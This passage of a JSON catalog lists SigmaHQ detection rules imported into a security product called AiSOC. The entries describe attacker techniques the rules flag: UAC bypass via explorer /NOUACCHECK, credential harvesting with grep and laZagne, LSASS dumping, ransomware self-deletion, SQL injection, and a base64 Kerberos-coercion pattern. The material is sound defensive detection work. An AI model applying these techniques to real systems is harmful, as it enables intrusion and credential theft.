"imported_at": "2026-05-04", "upstream_path": "rules/network/zeek/zeek_dce_rpc_mitre_bzar_persistence.yml" } }, { "id": "sigmahq-sigma-534f2ef7-e8a2-4433-816d-c91bccde289b", "type": "detection", "name": "Explorer NOUACCHECK Flag", "description": "Detects suspicious starts of explorer.exe that use the /NOUACCHECK flag that allows to run all sub processes of that newly started explorer.exe without any UAC checks", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1548.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/explorer-nouaccheck-flag.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "534f2ef7-e8a2-4433-816d-c91bccde289b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_explorer_nouaccheck.yml" } }, { "id": "sigmahq-sigma-536e2947-3729-478c-9903-745aaffe60d2", "type": "detection", "name": "Suspicious PowerShell Invocations - Specific - ProcessCreation", "description": "Detects suspicious PowerShell invocation command parameters", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-powershell-invocations-specific-processcreation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "536e2947-3729-478c-9903-745aaffe60d2", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_powershell_invocation_specific.yml" } }, { "id": "sigmahq-sigma-53821412-17b0-4147-ade0-14faae67d54b", "type": "detection", "name": "System Integrity Protection (SIP) Enumeration", "description": "Detects the use of csrutil to view the Configure System Integrity Protection (SIP) status. This technique is used in post-exploit scenarios.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1518.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/system-integrity-protection-sip-enumeration.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "53821412-17b0-4147-ade0-14faae67d54b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/macos/process_creation/proc_creation_macos_csrutil_status.yml" } }, { "id": "sigmahq-sigma-5394fcc7-aeb2-43b5-9a09-cac9fc5edcd5", "type": "detection", "name": "Suspicious Execution Location Of Wermgr.EXE", "description": "Detects suspicious Windows Error Reporting manager (wermgr.exe) execution location.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-execution-location-of-wermgr-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "5394fcc7-aeb2-43b5-9a09-cac9fc5edcd5", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_wermgr_susp_exec_location.yml" } }, { "id": "sigmahq-sigma-53acd925-2003-440d-a1f3-71a5253fe237", "type": "detection", "name": "Anonymous IP Address", "description": "Indicates sign-ins from an anonymous IP address, for example, using an anonymous browser or VPN.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1528" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/anonymous-ip-address.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "53acd925-2003-440d-a1f3-71a5253fe237", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/identity_protection/azure_identity_protection_anonymous_ip_address.yml" } }, { "id": "sigmahq-sigma-53ad8e36-f573-46bf-97e4-15ba5bf4bb51", "type": "detection", "name": "Password Change on Directory Service Restore Mode (DSRM) Account", "description": "Detects potential attempts made to set the Directory Services Restore Mode administrator password.\nThe Directory Service Restore Mode (DSRM) account is a local administrator account on Domain Controllers.\nAttackers may change the password in order to obtain persistence.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1098" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": true, "path": "detections/sigma-imports/endpoint/password-change-on-directory-service-restore-mode-dsrm-account.yaml", "provenance": { "source": "SigmaHQ/sigma", "source_id": "53ad8e36-f573-46bf-97e4-15ba5bf4bb51", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_susp_dsrm_password_change.yml" } }, { "id": "sigmahq-sigma-53b1b378-9b06-4992-b972-dde6e423d2b4", "type": "detection", "name": "Credentials In Files", "description": "Detecting attempts to extract passwords with grep and laZagne", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1552.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/credentials-in-files.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "53b1b378-9b06-4992-b972-dde6e423d2b4", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/macos/process_creation/proc_creation_macos_find_cred_in_files.yml" } }, { "id": "sigmahq-sigma-53bb4f7f-48a8-4475-ac30-5a82ddfdf6fc", "type": "detection", "name": "Potential MFA Bypass Using Legacy Client Authentication", "description": "Detects successful authentication from potential clients using legacy authentication via user agent strings. This could be a sign of MFA bypass using a password spray attack.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1078.004", "T1110" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-mfa-bypass-using-legacy-client-authentication.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "53bb4f7f-48a8-4475-ac30-5a82ddfdf6fc", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/signin_logs/azure_ad_suspicious_signin_bypassing_mfa.yml" } }, { "id": "sigmahq-sigma-53d4bb30-3f36-4e8a-b078-69d36c4a79ff", "type": "detection", "name": "COM Object Execution via Xwizard.EXE", "description": "Detects the execution of Xwizard tool with the \"RunWizard\" flag and a GUID like argument.\nThis utility can be abused in order to run custom COM object created in the registry.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/com-object-execution-via-xwizard-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "53d4bb30-3f36-4e8a-b078-69d36c4a79ff", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_xwizard_runwizard_com_object_exec.yml" } }, { "id": "sigmahq-sigma-53d8d3e1-ca33-4012-adf3-e05a4d652e34", "type": "detection", "name": "Process Memory Dump Via Dotnet-Dump", "description": "Detects the execution of \"dotnet-dump\" with the \"collect\" flag. The execution could indicate potential process dumping of critical processes such as LSASS.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/process-memory-dump-via-dotnet-dump.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "53d8d3e1-ca33-4012-adf3-e05a4d652e34", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_dotnetdump_memory_dump.yml" } }, { "id": "sigmahq-sigma-53ef0cef-fa24-4f25-a34a-6c72dfa2e6e2", "type": "detection", "name": "Query Usage To Exfil Data", "description": "Detects usage of \"query.exe\" a system binary to exfil information such as \"sessions\" and \"processes\" for later use", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/query-usage-to-exfil-data.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "53ef0cef-fa24-4f25-a34a-6c72dfa2e6e2", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_query_session_exfil.yml" } }, { "id": "sigmahq-sigma-54127bd4-f541-4ac3-afdb-ea073f63f692", "type": "detection", "name": "Potential Persistence Via Notepad++ Plugins", "description": "Detects creation of new \".dll\" files inside the plugins directory of a notepad++ installation by a process other than \"gup.exe\". Which could indicates possible persistence", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-persistence-via-notepad-plugins.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "54127bd4-f541-4ac3-afdb-ea073f63f692", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_notepad_plus_plus_persistence.yml" } }, { "id": "sigmahq-sigma-542b9912-c01f-4e3f-89a8-014c48cdca7d", "type": "detection", "name": "Azure Device No Longer Managed or Compliant", "description": "Identifies when a device in azure is no longer managed or compliant", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/azure-device-no-longer-managed-or-compliant.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "542b9912-c01f-4e3f-89a8-014c48cdca7d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/activity_logs/azure_device_no_longer_managed_or_compliant.yml" } }, { "id": "sigmahq-sigma-545a5da6-f103-4919-a519-e9aec1026ee4", "type": "detection", "name": "Microsoft Malware Protection Engine Crash", "description": "This rule detects a suspicious crash of the Microsoft Malware Protection Engine", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1211", "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/microsoft-malware-protection-engine-crash.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "545a5da6-f103-4919-a519-e9aec1026ee4", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/application/application_error/win_application_error_msmpeng_crash.yml" } }, { "id": "sigmahq-sigma-5468045b-4fcc-4d1a-973c-c9c9578edacb", "type": "detection", "name": "Raw Paste Service Access", "description": "Detects direct access to raw pastes in different paste services often used by malware in their second stages to download malicious code in encrypted or encoded form", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1071.001", "T1102.001", "T1102.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/raw-paste-service-access.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "5468045b-4fcc-4d1a-973c-c9c9578edacb", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/web/proxy_generic/proxy_raw_paste_service_access.yml" } }, { "id": "sigmahq-sigma-54773c5f-f1cc-4703-9126-2f797d96a69d", "type": "detection", "name": "PUA - Advanced Port Scanner Execution", "description": "Detects the use of Advanced Port Scanner.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1046", "T1135" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/pua-advanced-port-scanner-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "54773c5f-f1cc-4703-9126-2f797d96a69d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_pua_advanced_port_scanner.yml" } }, { "id": "sigmahq-sigma-54786ddc-5b8a-11ed-9b6a-0242ac120002", "type": "detection", "name": "Suspicious Ping/Del Command Combination", "description": "Detects a method often used by ransomware. Which combines the \"ping\" to wait a couple of seconds and then \"del\" to delete the file in question. Its used to hide the file responsible for the initial infection for example", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1070.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-ping-del-command-combination.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "54786ddc-5b8a-11ed-9b6a-0242ac120002", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_cmd_ping_del_combined_execution.yml" } }, { "id": "sigmahq-sigma-547dfc53-ebf6-4afe-8d2e-793d9574975d", "type": "detection", "name": "OpenCanary - REDIS Action Command Attempt", "description": "Detects instances where a REDIS service on an OpenCanary node has had an action command attempted.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1003", "T1213" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/opencanary-redis-action-command-attempt.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "547dfc53-ebf6-4afe-8d2e-793d9574975d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/application/opencanary/opencanary_redis_command.yml" } }, { "id": "sigmahq-sigma-5496ff55-42ec-4369-81cb-00f417029e25", "type": "detection", "name": "Multifactor Authentication Interrupted", "description": "Identifies user login with multifactor authentication failures, which might be an indication an attacker has the password for the account but can't pass the MFA challenge.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1078.004", "T1110", "T1621" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/multifactor-authentication-interrupted.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "5496ff55-42ec-4369-81cb-00f417029e25", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/signin_logs/azure_mfa_interrupted.yml" } }, { "id": "sigmahq-sigma-5498fc09-adc6-4804-b9d9-5cca1f0b8760", "type": "detection", "name": "OpenCanary - HTTPPROXY Login Attempt", "description": "Detects instances where an HTTPPROXY service on an OpenCanary node has had an attempt to proxy another page.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1090" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/opencanary-httpproxy-login-attempt.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "5498fc09-adc6-4804-b9d9-5cca1f0b8760", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/application/opencanary/opencanary_httpproxy_login_attempt.yml" } }, { "id": "sigmahq-sigma-54b9a76a-3c71-4673-b4b3-2edb4566ea7b", "type": "detection", "name": "AWS EC2 VM Export Failure", "description": "An attempt to export an AWS EC2 instance has been detected. A VM Export might indicate an attempt to extract information from an instance.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1005", "T1537" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/aws-ec2-vm-export-failure.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "54b9a76a-3c71-4673-b4b3-2edb4566ea7b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/aws/cloudtrail/aws_ec2_vm_export_failure.yml" } }, { "id": "sigmahq-sigma-54f0434b-726f-48a1-b2aa-067df14516e4", "type": "detection", "name": "Password Protected ZIP File Opened (Suspicious Filenames)", "description": "Detects the extraction of password protected ZIP archives with suspicious file names. See the filename variable for more details on which file has been opened.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1027", "T1105", "T1036" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/password-protected-zip-file-opened-suspicious-filenames.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "54f0434b-726f-48a1-b2aa-067df14516e4", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_susp_opened_encrypted_zip_filename.yml" } }, { "id": "sigmahq-sigma-550bbb84-ce5d-4e61-84ad-e590f0024dcd", "type": "detection", "name": "File Encryption Using Gpg4win", "description": "Detects usage of Gpg4win to encrypt files", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/file-encryption-using-gpg4win.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "550bbb84-ce5d-4e61-84ad-e590f0024dcd", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_gpg4win_encryption.yml" } }, { "id": "sigmahq-sigma-550d3350-bb8a-4ff3-9533-2ba533f4a1c0", "type": "detection", "name": "ProxyLogon MSExchange OabVirtualDirectory", "description": "Detects specific patterns found after a successful ProxyLogon exploitation in relation to a Commandlet invocation of Set-OabVirtualDirectory", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "critical", "category": "_quarantine", "mitre_techniques": [ "T1587.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/proxylogon-msexchange-oabvirtualdirectory.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "550d3350-bb8a-4ff3-9533-2ba533f4a1c0", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/msexchange/win_exchange_proxylogon_oabvirtualdir.yml" } }, { "id": "sigmahq-sigma-5513deaf-f49a-46c2-a6c8-3f111b5cb453", "type": "detection", "name": "SQL Injection Strings In URI", "description": "Detects potential SQL injection attempts via GET requests in access logs.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1190" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/sql-injection-strings-in-uri.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "5513deaf-f49a-46c2-a6c8-3f111b5cb453", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/web/webserver_generic/web_sql_injection_in_access_logs.yml" } }, { "id": "sigmahq-sigma-551d9c1f-816c-445b-a7a6-7a3864720d60", "type": "detection", "name": "Potential Excel.EXE DCOM Lateral Movement Via ActivateMicrosoftApp", "description": "Detects suspicious child processes of Excel which could be an indicator of lateral movement leveraging the \"ActivateMicrosoftApp\" Excel DCOM object.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1021.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-excel-exe-dcom-lateral-movement-via-activatemicrosoftapp.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "551d9c1f-816c-445b-a7a6-7a3864720d60", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_office_excel_dcom_lateral_movement.yml" } }, { "id": "sigmahq-sigma-552b6b65-df37-4d3e-a258-f2fc4771ae54", "type": "detection", "name": "Potential Antivirus Software DLL Sideloading", "description": "Detects potential DLL sideloading of DLLs that are part of antivirus software suchas McAfee, Symantec...etc", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1574.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-antivirus-software-dll-sideloading.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "552b6b65-df37-4d3e-a258-f2fc4771ae54", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/image_load/image_load_side_load_antivirus.yml" } }, { "id": "sigmahq-sigma-554601fb-9b71-4bcc-abf4-21a611be4fde", "type": "detection", "name": "Suspicious Recursive Takeown", "description": "Adversaries can interact with the DACLs using built-in Windows commands takeown which can grant adversaries higher permissions on specific files and folders", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1222.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-recursive-takeown.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "554601fb-9b71-4bcc-abf4-21a611be4fde", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_takeown_recursive_own.yml" } }, { "id": "sigmahq-sigma-555155a2-03bf-4fe7-af74-d176b3fdbe16", "type": "detection", "name": "Driver Added To Disallowed Images In HVCI - Registry", "description": "Detects changes to the \"HVCIDisallowedImages\" registry value to potentially add a driver to the list, in order to prevent it from loading.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/driver-added-to-disallowed-images-in-hvci-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "555155a2-03bf-4fe7-af74-d176b3fdbe16", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_hvci_disallowed_images.yml" } }, { "id": "sigmahq-sigma-55695bc0-c8cf-461f-a379-2535f563c854", "type": "detection", "name": "Applications That Are Using ROPC Authentication Flow", "description": "Resource owner password credentials (ROPC) should be avoided if at all possible as this requires the user to expose their current password credentials to the application directly.\nThe application then uses those credentials to authenticate the user against the identity provider.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1078" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/applications-that-are-using-ropc-authentication-flow.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "55695bc0-c8cf-461f-a379-2535f563c854", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/signin_logs/azure_app_ropc_authentication.yml" } }, { "id": "sigmahq-sigma-5588576c-5898-4fac-bcdd-7475a60e8f43", "type": "detection", "name": "Suspicious DNS Query Indicating Kerberos Coercion via DNS Object SPN Spoofing - Network", "description": "Detects DNS queries containing patterns associated with Kerberos coercion attacks via DNS object spoofing.\nThe pattern \"1UWhRCAAAAA..BAAAA\" is a base64-encoded signature that corresponds to a marshaled CREDENTIAL_TARGET_INFORMATION structure.\nAttackers can use this technique to coerce authentication from victim systems to attacker-controlled hosts.\nIt is one of the strong indicators of a Kerberos coercion attack, where adversaries manipulate DNS records\nto spoof Service Principal Names (SPNs) and redirect authentication requests like CVE-2025-33073.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1557.001", "T1187" ], "log_source": null, "playbook": null, "verified": 